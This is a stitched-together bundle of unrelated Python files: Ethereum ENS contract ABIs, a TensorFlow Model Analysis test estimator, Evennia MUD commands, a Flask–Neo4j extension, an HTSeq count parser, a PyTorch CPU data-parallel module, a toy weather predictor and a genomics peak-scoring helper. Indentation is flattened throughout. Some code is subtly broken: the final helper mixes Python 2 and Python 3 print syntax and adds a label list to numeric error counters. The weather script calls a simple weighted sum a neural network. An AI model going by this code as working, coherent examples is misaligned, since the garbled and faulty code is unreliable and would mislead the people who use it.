"name": "DeedClosed",
"type": "event"
}
]
FIFS_REGISTRAR = [
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "",
"type": "bytes32"
}
],
"name": "expiryTimes",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "subnode",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "register",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "rootNode",
"outputs": [
{
"name": "",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
},
{
"name": "node",
"type": "bytes32"
}
],
"type": "constructor"
}
]
RESOLVER = [
{
"constant": True,
"inputs": [
{
"name": "interfaceID",
"type": "bytes4"
}
],
"name": "supportsInterface",
"outputs": [
{
"name": "",
"type": "bool"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "contentTypes",
"type": "uint256"
}
],
"name": "ABI",
"outputs": [
{
"name": "contentType",
"type": "uint256"
},
{
"name": "data",
"type": "bytes"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "x",
"type": "bytes32"
},
{
"name": "y",
"type": "bytes32"
}
],
"name": "setPubkey",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "content",
"outputs": [
{
"name": "ret",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "addr",
"outputs": [
{
"name": "ret",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "contentType",
"type": "uint256"
},
{
"name": "data",
"type": "bytes"
}
],
"name": "setABI",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "name",
"outputs": [
{
"name": "ret",
"type": "string"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "name",
"type": "string"
}
],
"name": "setName",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "hash",
"type": "bytes32"
}
],
"name": "setContent",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "pubkey",
"outputs": [
{
"name": "x",
"type": "bytes32"
},
{
"name": "y",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "addr",
"type": "address"
}
],
"name": "setAddr",
"outputs": [],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
}
],
"payable": False,
"type": "constructor"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "a",
"type": "address"
}
],
"name": "AddrChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "hash",
"type": "bytes32"
}
],
"name": "ContentChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "name",
"type": "string"
}
],
"name": "NameChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": True,
"name": "contentType",
"type": "uint256"
}
],
"name": "ABIChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "x",
"type": "bytes32"
},
{
"indexed": False,
"name": "y",
"type": "bytes32"
}
],
"name": "PubkeyChanged",
"type": "event"
}
]
REVERSE_REGISTRAR = [
{
"constant": False,
"inputs": [
{
"name": "owner",
"type": "address"
},
{
"name": "resolver",
"type": "address"
}
],
"name": "claimWithResolver",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "owner",
"type": "address"
}
],
"name": "claim",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "defaultResolver",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "addr",
"type": "address"
}
],
"name": "node",
"outputs": [
{
"name": "ret",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "name",
"type": "string"
}
],
"name": "setName",
"outputs": [
{
"name": "node",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"inputs": [
{
"name": "ensAddr",
"type": "address"
},
{
"name": "resolverAddr",
"type": "address"
}
],
"payable": False,
"type": "constructor"
}
]
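# A minimal consumption sketch (an assumption -- web3.py is neither imported
# nor required by this module, and the registry address is a placeholder):
#
#     from web3 import Web3
#     w3 = Web3(Web3.HTTPProvider("http://localhost:8545"))
#     registry = w3.eth.contract(address="0x...", abi=ENS)
#     resolver_address = registry.functions.resolver(namehash).call()
#
# where `namehash` is the bytes32 namehash of the ENS name being queried.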
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
          # Introduce a direct dependency on the values Tensor. If we
          # introduce another intervening op like sparse_tensor_to_dense then
          # regardless of whether TFMA correctly wraps SparseTensors we will
          # not encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
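# A minimal invocation sketch; the export paths below are placeholders and
# not part of this module.
if __name__ == '__main__':
  simple_control_dependency_estimator('/tmp/export', '/tmp/eval_export')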
|
"""
Example command module template
Copy this module up one level to gamesrc/commands/ and name it as
befits your use. You can then use it as a template to define your new
commands. To use them you also need to group them in a CommandSet (see
examples/cmdset.py)
"""
import time
from ev import Command as BaseCommand
from ev import default_cmds
from ev import utils
from settings import *
"""
This sets up the basis for a Evennia's 'MUX-like' command
style. The idea is that most other Mux-related commands should
just inherit from this and don't have to implement parsing of
their own unless they do something particularly advanced.
A MUXCommand command understands the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdname. The rest is stored
in self.args.
The MuxCommand parser breaks self.args into its constituents and stores them in the
following variables:
    self.switches = optional list of /switches (without the /)
    self.raw = the raw argument input, including switches
    self.args = everything *except* the switches
    self.lhs = everything to the left of '=' (lhs: 'left-hand side'); if no
        '=' is found, this is identical to self.args
    self.rhs = everything to the right of '=' (rhs: 'right-hand side'); if
        no '=' is found, this is None
    self.lhslist = self.lhs split into a list by comma
    self.rhslist = self.rhs split into a list by comma
    self.arglist = list of space-separated args (including '=' if it exists)
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
class Sheet(default_cmds.MuxCommand):
"""
+sheet looks up the character information of your character. You can use
the /bg switch to get the background of your character.
    Privileged users can give a player's name as an argument to this command
and get their info.
"""
key = "sheet"
locks = "cmd:all()"
help_category = "Character"
def display_sheet(self,char):
"""
Displays a character sheet.
"""
if not char.db.stats:
stat_dict = { }
else:
stat_dict = char.db.stats
self.caller.msg(char.name + ", the " + str(char.db.sex) + " " + str(char.db.species) + ":")
self.caller.msg("")
for key, value in stat_dict.items():
self.caller.msg("{c%-11s: {y%s" % (key, str(value)))
self.caller.msg("")
if char.db.qualities:
for key, value in char.db.qualities.items():
line = "{c%-20s{b: {g%s{n" % (key, value)
self.caller.msg(line)
def display_background(self, char):
"""
Displays a character's background.
"""
self.caller.msg("The legend of " + char.name + ":")
self.caller.msg("")
background = char.db.background
if not background:
self.caller.msg(" This tale is not written.")
return
self.caller.msg(background)
def func(self):
"""
Primary function for +sheet.
"""
self.caller.msg("")
if self.args:
if not (self.caller.check_permstring("Immortals") or self.caller.check_permstring("Wizards")
or self.caller.check_permstring("PlayerHelpers")):
self.caller.msg("Players cannot look at each other's sheets.")
return
            char_list = self.caller.search(self.args, global_search=True, ignore_errors=True)
            if char_list:
                char = char_list[0]
            else:
                self.caller.msg("No such character: " + self.args)
                self.caller.msg("")
                return
else:
char = self.caller
if "bg" in self.switches:
self.display_background(char)
self.caller.msg("")
return
self.display_sheet(char)
self.caller.msg("")
class WhoSpec(default_cmds.MuxCommand):
"""
Whospecies looks up all players in the room and grabs their name, sex,
species, and status. You can use the /far switch to look up a remote player.
For instance,
ws/far Thaddius
...will look up Thaddius's name, sex, species, and status.
"""
# these need to be specified
key = "whospecies"
aliases = ["ws", "whos", "whospec"]
locks = "cmd:all()"
help_category = "Character"
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
characters = [ thing for thing in self.caller.location.contents
if thing.player
]
if "far" in self.switches:
characters = [ thing for thing in
self.caller.search(self.args, global_search=True, ignore_errors=True)
if thing.player
]
        idle_threshold = 180  # Three minutes minimum idle.
        self.caller.msg("+-Stat---Name----------------------------Sex---------Species-----------------+")
        for character in characters:
            if character.sessions:
                idle_time = time.time() - character.sessions[0].cmd_last_visible
                if idle_time > idle_threshold:
                    name = character.name + "[Idle " + utils.time_format(idle_time, 1) + "]"
                else:
                    name = character.name
            else:
                name = character.name + "[Zzz]"
            status = character.db.status
            if not status:
                status = ""
            line = "| %-5s| %-30s| %-10s| %-24s|" % (status, name, character.db.sex, character.db.species)
            self.caller.msg(line)
self.caller.msg("+----------------------------------------------------------------------------+")
|
from __future__ import print_function
import time
import logging
from py2neo import Graph,Node
from py2neo.ext import ogm
from py2neo.packages.httpstream.http import SocketError
log = logging.getLogger('flask.neo4j')
logging.basicConfig()
# Find the stack on which we want to store the GraphDatabaseService instance.
# Starting with Flask 0.9, the _app_ctx_stack is the correct one,
# before that we need to use the _request_ctx_stack.
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class Neo4j(object):
"""Automatically connects to Neo4j graph database using parameters defined
in Flask configuration.
One can use this extension by providing the Flask app on instantiation or
by calling the :meth:`init_app` method on an instance object of `Neo4j`. An example
of providing the application on instantiation: ::
app = Flask(__name__)
n4j = Neo4j(app)
...and an example calling the :meth:`init_app` method instead: ::
n4j = Neo4j()
def init_app():
app = Flask(__name__)
n4j.init_app(app)
return app
    One can also provide a dict of indexes that will be used to automatically
    get or create indexes in the graph database ::
app = Flask(__name__)
graph_indexes = {'Species': neo4j.Node}
n4j = Neo4j(app, graph_indexes)
        print(n4j.gdb.neo4j_version)
species_index = n4j.index['Species']
...
"""
def __init__(self, app=None, indexes=None):
self.app = app
self._indexes = indexes
if app is not None:
self.init_app(app)
print ("flask.ext.Neo4j init_app called")
def init_app(self, app):
"""Initialize the `app` for use with this :class:`~Neo4j`. This is
called automatically if `app` is passed to :meth:`~Neo4j.__init__`.
The app is configured according to these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:param flask.Flask app: the application configured for use with
this :class:`~Neo4j`
"""
self.app = app
app.n4j = self
if not hasattr(app, 'extensions'):
app.extensions = {}
app.extensions['neo4j'] = self
# Use the newstyle teardown_appcontext if it's available,
# otherwise fall back to the request context
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
else:
app.teardown_request(self.teardown)
def teardown(self, exception):
ctx = stack.top # TODO clean up teardown related to graph_db behavior
if hasattr(ctx, 'graph_db'):
# py2neo does not have an 'open' connection that needs closing
ctx.graph_db = None
@property
def gdb(self):
"""The graph database service instance as a property, for convenience.
Note: The property will use these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:return: the graph database service as a property
"""
retry = False
if 'CONNECTION_RETRY' in self.app.config:
retry = self.app.config['CONNECTION_RETRY']
retry_interval = 5
if 'RETRY_INTERVAL' in self.app.config:
retry_interval = self.app.config['RETRY_INTERVAL']
retry_count = 0
try:
self.graph_db = Graph(self.app.config['GRAPH_DATABASE'])
except SocketError as se:
            log.error('SocketError: {0}'.format(se))
if retry:
while retry_count < 3:
log.debug('Waiting {0}secs before Connection Retry to GraphDatabaseService'.format(
retry_interval
))
time.sleep(retry_interval)
#time.sleep(1)
retry_count += 1
try:
self.graph_db = Graph(self.app.config['GRAPH_DATABASE'])
except SocketError as sse:
                        log.error('SocketError: {0}'.format(sse))
if not hasattr(self, 'index'):
self.index = {}
# add all the indexes as app attributes
if self._indexes is not None:
            for i, i_type in self._indexes.items():
log.debug('getting or creating graph index:{0} {1}'.format(
i, i_type
))
self.index[i] = \
self.graph_db.legacy.get_or_create_index(i_type, i)
return self.graph_db
@property
def store(self):
"""
The object graph mapping store available as a property.
Note: The property will use these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:return: the object graph mapping store property
"""
store = ogm.Store(self.gdb)
return store
def delete_index(self, index_name):
"""
Simple delete index capability that takes only a name.
Note: uses the index_types as remembered from indexes variable given at
initialization.
:param index_name: the name of the index to delete from the database
"""
i_type = self._indexes[index_name]
self.graph_db.legacy.delete_index(content_type=i_type, index_name=index_name)
if __name__ == '__main__':
from flask import Flask
app = Flask(__name__)
app.config['GRAPH_DATABASE'] = 'http://localhost:7474/db/data/'
graph_indexes = {'Species': Node}
flask4j = Neo4j(app, graph_indexes)
print (flask4j.gdb.neo4j_version)
species_index = flask4j.index['Species']
print ('species index:', species_index)
flask4j.delete_index('Species')
|
"""
Read a directory of expression counts in ht-seq format. Each sample
should be an individual file in the directory. File names and
sample order are specified in the config file (order is determined
by order IN the config.)
This class is intended to return the raw dataframe of samples with
missing sample columns as NaN.
"""
import pandas as pd
from pathos.multiprocessing import ProcessPool
import pathlib
try:
from functools import reduce # for py3 compatibility
except ImportError:
pass
class HtSeqParser(object):
def __init__(self, nodes=2):
self.nodes = nodes
def parse_data(self, data_paths, sample_names):
"""
Read the input files from the config file and load in to a
pandas dataframe.
        params
            data_paths: list of file paths specified in the config,
                returned from config parse
            sample_names: list of sample names specified in the config,
                returned from config parse
"""
output = self.load_data(data_paths, sample_names)
data, ercc_df = (self.merge_dfs(output)
.pipe(self.df_cleanup)
.pipe(self.split_on_ercc))
return data, ercc_df
def load_data(self, data_paths, sample_names):
" Multiprocess load of files in to a list of dfs "
pool = ProcessPool(nodes=self.nodes)
dfs = pool.map(self.load_func, zip(data_paths, sample_names))
return dfs
@staticmethod
def load_func(data_tuple):
path, sample_name = data_tuple
return pd.read_csv(path, sep='\t', names=['gene', sample_name])
def merge_dfs(self, dfs):
return reduce(lambda x, y: pd.merge(x, y, on='gene', how='outer'), dfs)
def df_cleanup(self, df_old):
" Clean away unwanted columns, reset index, and fillna "
df = df_old.copy()
        df = df[~df['gene'].str.startswith('__')]
df.set_index('gene', inplace=True)
df.fillna(value='Nan', inplace=True)
return df
def split_on_ercc(self, df):
" Extract the ERCC data "
ercc_cols = df.index.str.startswith('ERCC-')
ercc_df = df[ercc_cols]
data = df[~ercc_cols]
return data, ercc_df
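# A minimal usage sketch; the count-file paths and sample names below are
# placeholders and assume HTSeq-count output exists at those locations.
if __name__ == '__main__':
    parser = HtSeqParser(nodes=2)
    data, ercc_df = parser.parse_data(
        ['sample_a_counts.txt', 'sample_b_counts.txt'],
        ['sample_a', 'sample_b'])
    print(data.head())
    print(ercc_df.head())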
|
import torch
from torch._utils import _flatten_dense_tensors, _unflatten_dense_tensors
import torch.distributed.deprecated as dist
from torch.nn.modules import Module
from collections import defaultdict
from torch.autograd import Variable
import torch.utils.hooks
class DistributedDataParallelCPU(Module):
r"""Implements distributed data parallelism for CPU at the module level.
    This module supports the ``mpi``, ``gloo``, ``tcp`` backends.
This container parallelizes the application of the given module by
splitting the input across the specified devices by chunking in the batch
dimension. The module is replicated on each machine, and each such replica
handles a portion of the input. During the backwards pass, gradients from
each node are averaged.
This module could be used in conjunction with the DistributedSampler,
(see :class `torch.utils.data.distributed.DistributedSampler`)
    which will load a subset of the original dataset for each node with the same
batch size. So strong scaling should be configured like this:
n = 1, batch size = 128
n = 2, batch size = 64
n = 4, batch size = 32
n = 8, batch size = 16
Creation of this class requires the distributed package to be already
initialized in the process group mode
(see :func:`torch.distributed.deprecated.init_process_group`).
.. warning::
Constructor, forward method, and differentiation of the output (or a
function of the output of this module) is a distributed synchronization
        point. Take that into account in case different nodes might be
executing different code.
.. warning::
This module assumes all parameters are registered in the model by the
time it is created. No parameters should be added nor removed later.
.. warning::
This module assumes all gradients are dense.
.. warning::
This module doesn't work with :func:`torch.autograd.grad` (i.e. it will
only work if gradients are to be accumulated in ``.grad`` attributes of
parameters).
.. note::
Parameters are broadcast between nodes in the __init__() function. The
module performs an all-reduce step on gradients and assumes that they
will be modified by the optimizer in all nodes in the same way.
.. warning::
Forward and backward hooks defined on :attr:`module` and its submodules
won't be invoked anymore, unless the hooks are initialized in the
:meth:`forward` method.
Args:
module: module to be parallelized
Example::
>>> torch.distributed.deprecated.init_process_group(world_size=4, init_method='...')
>>> net = torch.nn.DistributedDataParallelCPU(model)
"""
def __init__(self, module):
super(DistributedDataParallelCPU, self).__init__()
self.module = module
self.sync_parameters()
def allreduce_params():
if self.needs_reduction:
self.needs_reduction = False
buckets = defaultdict(list)
for param in self.module.parameters():
if param.requires_grad and param.grad is not None:
tp = type(param.data)
buckets[tp].append(param)
for bucket in buckets.values():
grads = [param.grad.data for param in bucket]
coalesced = _flatten_dense_tensors(grads)
dist.all_reduce(coalesced)
coalesced /= dist.get_world_size()
for buf, synced in zip(grads, _unflatten_dense_tensors(coalesced, grads)):
buf.copy_(synced)
for param in list(self.module.parameters()):
@torch.utils.hooks.unserializable_hook
def allreduce_hook(*unused):
Variable._execution_engine.queue_callback(allreduce_params)
if param.requires_grad:
param.register_hook(allreduce_hook)
def sync_parameters(self):
for param in self.module.parameters():
dist.broadcast(param.data, 0)
def forward(self, *inputs, **kwargs):
self.needs_reduction = True
return self.module(*inputs, **kwargs)
|
# seer2.py
# python 3.5
# Simple demo of super-basic neural-network weather prediction.
# This version is re-written and very cleaned-up.
# Chris Bugg
# Created: 2/1/15
# Updated: 3/23/17
# TODO: Add other things to track
# TODO: Add API to fetch WX data
# TODO: Create dynamic version
import random
class Seer:
# Multiplier models
rawlins_model = [.1]
laramie_model = [.1]
cheyenne_model = [.1]
# Training conditions
training_conditions_rawlins = [80]
training_conditions_laramie = [70]
training_conditions_cheyenne = [60]
# Training actual forecast
training_forecast = [75.0]
# Validation conditions
validation_conditions_rawlins = [60]
validation_conditions_laramie = [50]
validation_conditions_cheyenne = [40]
# Validation actual forecast
validation_forecast = [55.0]
# Predicted forecast
predicted_forecast = [10.0]
# Low chances, used to help randomness
low_chance = [0, 0, 0, 0.0001, -0.0001]
# Constructor
def __init__(self):
# Initial
self.initial()
# Training
self.training()
# Validation
self.validation()
# Update model values based on actual forecast
def update_model(self):
# If our prediction was too low, bump up model weights
if self.training_forecast[0] > self.predicted_forecast[0]:
self.rawlins_model[0] = self.rawlins_model[0] * 1.01 + random.choice(self.low_chance)
self.laramie_model[0] = self.laramie_model[0] * 1.01 + random.choice(self.low_chance)
self.cheyenne_model[0] = self.cheyenne_model[0] * 1.01 + random.choice(self.low_chance)
# If our prediction was too high, bump down model weights
elif self.training_forecast[0] < self.predicted_forecast[0]:
self.rawlins_model[0] = self.rawlins_model[0] * 0.99 + random.choice(self.low_chance)
self.laramie_model[0] = self.laramie_model[0] * 0.99 + random.choice(self.low_chance)
self.cheyenne_model[0] = self.cheyenne_model[0] * 0.99 + random.choice(self.low_chance)
# Make prediction based on model values
def training_predict(self):
self.predicted_forecast[0] = self.training_conditions_rawlins[0] * self.rawlins_model[0] + \
self.training_conditions_laramie[0] * self.laramie_model[0] + \
self.training_conditions_cheyenne[0] * self.cheyenne_model[0]
# Make prediction based on model values
def validation_predict(self):
self.predicted_forecast[0] = self.validation_conditions_rawlins[0] * self.rawlins_model[0] + \
self.validation_conditions_laramie[0] * self.laramie_model[0] + \
self.validation_conditions_cheyenne[0] * self.cheyenne_model[0]
# Make initial prediction based on initial values
def initial(self):
print("--Initial Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.training_conditions_rawlins))
print("Laramie: " + str(self.training_conditions_laramie))
print("Cheyenne: " + str(self.training_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.training_forecast))
# Train model based on training data
def training(self):
# Training
print("--Training...")
# Number times to train
iterations = 2000000
# Loop x times and train the model
for x in range(0, iterations):
# Updated model based on actual forecast
self.update_model()
# Update prediction values based on updated model
self.training_predict()
print("--Training Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.training_conditions_rawlins))
print("Laramie: " + str(self.training_conditions_laramie))
print("Cheyenne: " + str(self.training_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.training_forecast))
# Test models' behavior on new data
def validation(self):
# Perform Prediction based on trained model
self.validation_predict()
print("--Validation Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.validation_conditions_rawlins))
print("Laramie: " + str(self.validation_conditions_laramie))
print("Cheyenne: " + str(self.validation_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.validation_forecast))
if __name__ == "__main__":
    Seer()
|
import os
import time
import glob
import re
from ..calculateError import run as calculateError
from ..loadParser.parseLabel import run as parseLabel
from ..loadParser.loadPeak import run as loadPeak
"""
These methods are common parts of learning processes which are in
learn****param.py.
"""
def parallel_learning(MAX_CORE, learning_process, learning_processes):
"""
:param MAX_CORE:
:param learning_process:
:param learning_processes:
:return:
"""
if len(learning_processes) < MAX_CORE - 1:
learning_processes.append(learning_process)
learning_process.start()
else:
        keep_wait = True
        while keep_wait:
            time.sleep(0.1)
            for process in reversed(learning_processes):
                if not process.is_alive():
                    learning_processes.remove(process)
                    learning_processes.append(learning_process)
                    learning_process.start()
                    keep_wait = False
                    break
def return_accuracy(final, kry_file, result_file, valid_set):
"""
:param final:
:param kry_file:
:param result_file:
:param valid_set:
:return:
"""
if not valid_set:
print "there are no matched validation set :p\n"
exit()
else:
if not os.path.exists(result_file):
return 0.0
peaks = loadPeak(result_file)
if kry_file is None:
error_num, label_num = calculateError(peaks, parseLabel(valid_set, result_file))
else:
            error_num, label_num = 0, 0
            peaks_by_chr = []
            container = []
            for index in range(len(peaks)):
                if not (index + 1 == len(peaks)):
                    if peaks[index]['chr'] != peaks[index + 1]['chr']:
                        container.append(peaks[index])
                        peaks_by_chr.append(container)
                        container = []
                    else:
                        container.append(peaks[index])
                else:
                    # the last peak closes the final group
                    container.append(peaks[index])
                    peaks_by_chr.append(container)
            ## Output for each chromosome which has the same copy number.
for peak_by_chr in peaks_by_chr:
if len(peak_by_chr) > 0:
chromosome = peak_by_chr[0]['chr']
                    label = parseLabel(valid_set, result_file, input_chromosome=chromosome,
                                       cpNum_file_name=kry_file)
                    print(chromosome + " ====================== ")
                    temp_error, temp_label = calculateError(peak_by_chr, label)
                    error_num += temp_error
                    label_num += temp_label
                    print("============================\n")
                    if (temp_error == 0) and (temp_label == 0):
                        error_num += label
                        label_num += label
    if os.path.isfile(result_file) and (not final):
        os.remove(result_file)
    elif final:
        print(result_file + " is stored.")
    else:
        print("there is no result file..")
    if label_num == 0:
        return 0.0
    if final:
        print("Test Score ::" + str(1 - error_num / label_num) + "\n\n")
    return (1 - error_num / label_num)
def extract_chr_cpNum(chromosome_list, input_file, control_file, cpNum_controls, cpNum_files, kry_file, test_set,
validation_set, PATH, tool_name=None):
"""
This module extracts chromosome and copy number from a input file name.
Also, it makes directories which takes result files.
It will be used in start sections of each learning sources ( learn***params.py )
:param PATH:
:param chromosome_list:
    :param control_file:
:param cpNum_controls:
:param cpNum_files:
:param input_file:
:param kry_file:
:param test_set:
:param validation_set:
:param tool_name:
:return:
"""
if kry_file is None:
for label in validation_set + test_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = sorted(list(set(chromosome_list)))
for chromosome in chromosome_list:
output_dir = PATH + '/'+ tool_name +'/' + chromosome + '/'
if not os.path.exists(PATH + '/'+ tool_name +'/' + chromosome):
os.makedirs(output_dir)
else:
cpNum_files = glob.glob(PATH + "/" + input_file.split(".")[0] + ".CP[1-9].bam")
